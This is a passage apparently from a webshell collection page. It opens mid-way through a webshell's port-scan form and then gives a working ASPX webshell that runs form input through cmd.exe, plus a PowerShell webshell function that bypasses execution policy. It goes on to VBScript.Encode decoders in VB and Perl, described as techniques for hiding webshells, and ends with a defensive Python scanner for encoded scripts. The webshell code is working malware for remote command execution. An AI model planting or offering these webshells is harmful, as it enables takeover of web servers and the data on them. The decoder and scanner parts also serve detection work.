<asp:TextBox ID="Bin_PortsTextBox" runat="server" Width="356px">21,80,1433,3306,3389,4899,5631,43958,65500</asp:TextBox>
<asp:Button ID="Bin_ScancmdButton" runat="server" Text="Scan" OnClick="Bin_ScancmdButton_Click" /><br />
<asp:Label ID="Bin_ScanresLabel" runat="server"></asp:Label></div><hr /></asp:Panel>
</div></form>
</body>
</html>
CMS webshell
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Reflection" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>
<%@ Import Namespace="System.Web.UI" %>
<%@ Import Namespace="System.Web.UI.WebControls" %>
<script runat="server">
protected void exec(object sender, EventArgs e)
{
string item = cmd.Text;
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
string strOutput = null;
p.Start();
p.StandardInput.WriteLine(item);
p.StandardInput.WriteLine("exit");
strOutput = p.StandardOutput.ReadToEnd();
p.WaitForExit();
p.Close();
Response.Write("<pre>");
Response.Write(strOutput);
Response.Write("</pre>");
}
protected void Page_Load(object sender, EventArgs e)
{
}
</script>
<form id="form1" runat="server">
<asp:TextBox id="cmd" runat="server" Text="dir c:" /><asp:Button id="btn" onclick="exec" runat="server" Text="execute" />
</form>
Powershell webshell
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "powershell.exe";
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
Common encoding-conversion techniques used to hide webshells
VBScript.encode
Public Function DCScript(ByVal Script As String) As String
Dim s As String, l As Long
Dim b As Long, e As Long
Dim k As Long
l = LenB(Script): s = Space(l) '...
b = InStr(Script, "#@~^") '#@~^******==
e = InStr(Script, "^#~@") '******==^#~@
If b = 0 Or e = 0 Then
If MsgBox("没找到密文开始/结束标识,解密结果可能有误!要继续吗?", vbYesNo) = vbNo Then
Exit Function
Else
If e = 0 Then e = l Else e = e - 8
If b = 0 Then b = 1 Else b = b + 12
End If
Else
b = b + 12 'if 0, decrypt everything
e = e - 8 'if 0, count through to the end
End If
frmMain.Caption = "Decoding ..."
Script = Mid(Script, b, e - b + 1)
'Script = Replace(Script, "@#", Chr(13))
'Script = Replace(Script, "@&", Chr(10))
Script = Replace(Script, "@#@&", Chr(13) + Chr(10)) 'vbcCrlf
Script = Replace(Script, "@!", "<")
Script = Replace(Script, "@*", ">")
Script = Replace(Script, "@$", "@") 'generate @ last
'k = YXScrDecode(Script, s, Len(Script))
k = YXScrDecoder(Script, s)
's = Replace(s, Chr(13) + Chr(2), vbCrLf)'turned out to be caused by 0x10 and 0x0A
'which raises another question: why is element -1 of the char array 0x02
frmMain.Caption = "碰到我算你倒霉!"
DCScript = Left(s, k)
End Function
Perl code
#!/usr/bin/perl -w --
# VBScript/JScript.Encode Decoder
# Based on Full-Disclosure message "VBScript/JScript.Encode Decoder"
# by Andreas Marx <amarx [at] gega-it>, dated 16 Sep 03
# http://lists.netsys.com/pipermail/full-disclosure/2003-September/010155.html
#
# See also:
# http://www.saltstorm.net/lib-soya/examples/Soya.Encode.ScriptDecoder.wbm
# http://www.saltstorm.net/lib-soya/Soya/Encode/ScriptDecoder.js
# http://www.virtualconspiracy.com/scrdec.html
# http://www.virtualconspiracy.com/download/scrdec14.c
# http://www.r4k.net/dec/dec.pl
@itab = ( # table order
0,2,1,0,2,1,2,1,1,2,1,2,0,1,2,1,
0,1,2,1,0,0,2,1,1,2,0,1,2,1,1,2,
0,0,1,2,1,2,1,0,1,0,0,2,1,0,1,2,
0,1,2,1,0,0,2,1,1,0,0,2,1,0,1,2);
@dectab0 = ( # tables to decrypt
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x57","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x2E","\x47","\x7A","\x56","\x42","\x6A","\x2F","\x26","\x49","\x41","\x34","\x32","\x5B","\x76","\x72","\x43",
"\x38","\x39","\x70","\x45","\x68","\x71","\x4F","\x09","\x62","\x44","\x23","\x75","\x3C","\x7E","\x3E","\x5E",
"\xFF","\x77","\x4A","\x61","\x5D","\x22","\x4B","\x6F","\x4E","\x3B","\x4C","\x50","\x67","\x2A","\x7D","\x74",
"\x54","\x2B","\x2D","\x2C","\x30","\x6E","\x6B","\x66","\x35","\x25","\x21","\x64","\x4D","\x52","\x63","\x3F",
"\x7B","\x78","\x29","\x28","\x73","\x59","\x33","\x7F","\x6D","\x55","\x53","\x7C","\x3A","\x5F","\x65","\x46",
"\x58","\x31","\x69","\x6C","\x5A","\x48","\x27","\x5C","\x3D","\x24","\x79","\x37","\x60","\x51","\x20","\x36");
@dectab1 = (
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x7B","\x0A","\x0B","\x0C","\x0D","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x32","\x30","\x21","\x29","\x5B","\x38","\x33","\x3D","\x58","\x3A","\x35","\x65","\x39","\x5C","\x56","\x73",
"\x66","\x4E","\x45","\x6B","\x62","\x59","\x78","\x5E","\x7D","\x4A","\x6D","\x71","\x3C","\x60","\x3E","\x53",
"\xFF","\x42","\x27","\x48","\x72","\x75","\x31","\x37","\x4D","\x52","\x22","\x54","\x6A","\x47","\x64","\x2D",
"\x20","\x7F","\x2E","\x4C","\x5D","\x7E","\x6C","\x6F","\x79","\x74","\x43","\x26","\x76","\x25","\x24","\x2B",
"\x28","\x23","\x41","\x34","\x09","\x2A","\x44","\x3F","\x77","\x3B","\x55","\x69","\x61","\x63","\x50","\x67",
"\x51","\x49","\x4F","\x46","\x68","\x7C","\x36","\x70","\x6E","\x7A","\x2F","\x5F","\x4B","\x5A","\x2C","\x57");
@dectab2 = (
"\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x6E","\x0A","\x0B","\x0C","\x06","\x0E","\x0F",
"\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1A","\x1B","\x1C","\x1D","\x1E","\x1F",
"\x2D","\x75","\x52","\x60","\x71","\x5E","\x49","\x5C","\x62","\x7D","\x29","\x36","\x20","\x7C","\x7A","\x7F",
"\x6B","\x63","\x33","\x2B","\x68","\x51","\x66","\x76","\x31","\x64","\x54","\x43","\x3C","\x3A","\x3E","\x7E",
"\xFF","\x45","\x2C","\x2A","\x74","\x27","\x37","\x44","\x79","\x59","\x2F","\x6F","\x26","\x72","\x6A","\x39",
"\x7B","\x3F","\x38","\x77","\x67","\x53","\x47","\x34","\x78","\x5D","\x30","\x23","\x5A","\x5B","\x6C","\x48",
"\x55","\x70","\x69","\x2E","\x4C","\x21","\x24","\x4E","\x50","\x09","\x56","\x73","\x35","\x61","\x4B","\x58",
"\x3B","\x57","\x22","\x6D","\x4D","\x25","\x28","\x46","\x4A","\x32","\x41","\x3D","\x5F","\x4F","\x42","\x65");
$_ = join('', <>);
(m/\Q#@~^\E/ and $_ = $') or die "Start marker not found\n";
(m/\Q^#~@\E/ and $_ = $`) or die "End marker not found\n";
# We do not check leading checksum. Is trailing checksum always present?
(m/^[A-Za-z0-9+\/]{6}==/ and $_ = $') or die "No leading checksum\n";
(m/[A-Za-z0-9+\/]{6}==$/ and $_ = $`); # or die "No trailing checksum\n";
$pos = 0; # decrypt encrypted block
$special = 0;
foreach (split //) {
if ($special) {
$special = 0;
tr/&#!*$/\n\r<>@/;
}
elsif ($_ lt "\x80") { # encrypted?
if ($itab[$pos] == 0) { $_ = $dectab0[ord($_)]; }
elsif ($itab[$pos] == 1) { $_ = $dectab1[ord($_)]; }
elsif ($itab[$pos] == 2) { $_ = $dectab2[ord($_)]; }
if ($_ eq "\xff") {
$special = 1;
next;
}
}
print;
$pos = ($pos+1)%64;
}
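Both decoders above depend on the same framing: the "#@~^" start marker, an 8-character base64 field, the escape pairs "@#", "@&", "@!", "@*", "@$", and the "^#~@" end marker. The Python scanner below is an added example, not code from the original page or from the tools it quotes; it flags that framing and VBScript.Encode / JScript.Encode language tags in web-root files so encoded scripts can be pulled for review. The function names, the extension list and the sample bytes are constructed for illustration.

```python
import os
import re
from dataclasses import dataclass

START, END = b"#@~^", b"^#~@"                    # block markers used by both decoders above
FIELD = re.compile(rb"[A-Za-z0-9+/]{6}==")       # 8-byte field the Perl decoder strips
ESCAPE = re.compile(rb"@[&#!*$]")                # escape pairs the decoders translate back
LANG = re.compile(rb"language\s*=\s*[\"']?(?:VBScript|JScript)\.Encode", re.I)
WEB_EXTS = (".asp", ".asa", ".aspx", ".vbs", ".js", ".htm", ".html")  # assumed list

# Constructed sample: framing only, not a real encoded script.
SAMPLE = (
    b'<%@ LANGUAGE = "VBScript.Encode" %>\n'
    b'<%#@~^AAAAAA==cut-off block with no end marker%>\n'
    b'<%#@~^AAAAAA==constructed@#@&body@!x@*AAAAAA==^#~@%>\n'
    b'<!-- the text #@~^ quoted in a comment -->\n'
)


@dataclass
class Finding:
    offset: int
    kind: str      # language-tag | encoded-block | truncated-block | bad-header
    detail: str


def scan_bytes(data):
    """Return Findings for encoded-script framing found in one file's bytes."""
    found = [Finding(m.start(), "language-tag", m.group(0).decode("ascii"))
             for m in LANG.finditer(data)]
    pos = 0
    while (start := data.find(START, pos)) >= 0:
        header = FIELD.match(data, start + len(START))
        if header is None:
            # Marker text without the base64 field: likely documentation or noise.
            found.append(Finding(start, "bad-header", "start marker, no base64 field"))
            pos = start + len(START)
            continue
        end = data.find(END, header.end())
        nxt = data.find(START, header.end())
        if end < 0 or 0 <= nxt < end:
            # No end marker before the next block begins: file cut or tampered with.
            found.append(Finding(start, "truncated-block", "no end marker"))
            pos = header.end()
            continue
        body = data[header.end():end]
        # The trailing field is optional, as the Perl decoder's comment notes.
        trailer = FIELD.fullmatch(body[-8:]) is not None
        if trailer:
            body = body[:-8]
        detail = "body=%d trailer=%s escapes=%d" % (
            len(body), "yes" if trailer else "no", len(ESCAPE.findall(body)))
        found.append(Finding(start, "encoded-block", detail))
        pos = end + len(END)
    return sorted(found, key=lambda f: f.offset)


def scan_tree(root, exts=WEB_EXTS):
    """Walk a web root and return {path: [Finding, ...]} for files with hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    found = scan_bytes(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if found:
                hits[path] = found
    return hits


if __name__ == "__main__":
    for f in scan_bytes(SAMPLE):
        print(f.offset, f.kind, f.detail)
```

A hit is a lead for review, not a verdict: encoded script is rare in maintained applications, so each encoded-block or language-tag finding is worth decoding and reading.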